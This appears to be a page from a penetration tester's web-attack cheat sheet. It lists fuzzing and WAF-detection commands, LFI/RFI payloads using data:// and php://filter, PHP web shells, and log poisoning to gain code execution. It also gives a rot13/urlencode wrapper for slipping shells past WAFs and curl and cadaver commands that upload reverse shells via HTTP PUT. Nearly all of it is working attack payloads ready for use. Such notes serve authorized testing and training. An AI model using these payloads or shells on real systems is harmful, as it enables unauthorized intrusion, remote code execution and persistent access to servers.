Web useful commands

{: .no_toc }

Table of contents

{: .no_toc .text-delta }

  1. TOC

    {:toc}

Quick References

Fuzzing

dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
dirb http://10.0.0.10 -X .htm,.html,.php
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://10.0.0.10/test.php?file=FUZZ

Create wordlist

cewl ā€“w /root/Desktop/words.txt ā€“m 6  https://example.com

WAF detection

wafw00f http://192.168.56.102

Upload Files

curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

General Exploitation

LFI

Simple RFI

page=data://text/plain, <?php system("whoami");?>

Base64 encoded RFI

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==
lang=php://filter/convert.base64-encode/resource=index

Mini shell

page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

Base64 + URL encoded mini shell

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

RCE with LFI and SSH log poisoning

From

ssh '<?php system($_GET['c']); ?>'@192.168.0.23
http://192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=id

PHP shell WAF escape

Urlencode and rot13 encode

<?php

$enc = <<<ENC
__ENCODED PHP SHELL HERE__
ENC;

assert(urldecode(str_rot13($enc)));
?>

Use

<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php $c=$_GET[ā€˜cā€™]; echo `$c`; ?>

Insecure Methods

Methods Testing

nc <IP>

HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x

TRACE

telnet www.victim.com 80
> TRACE / HTTP/1.1
> Host: www.victim.com
curl -k -s -i -X TRACE https://IP -H "Cookies: Reflected"

PUT

curl http://192.168.40.130/test/ --upload-file /root/Desktop/curl.php -v

curl --upload-file php-reverse-shell.txt -v --url http://192.168.40.130/test/shell.php -0 --http1.0

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage

curl -X PUT -d "text or data to put" http://www.victim.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
cadaver http://<IP>/dav/
put /root/Desktop/shell.php

References

  • http://pentestmonkey.net

          White Papers
          Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
          Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
          Blind Security Testing - An Evolutionary Approach
          Command Injection in XML Signatures and Encryption
          Input Validation Cheat Sheet
          SQL Injection Cheat Sheet
PreviousSSL related CommandsNextReverse Shells

Last updated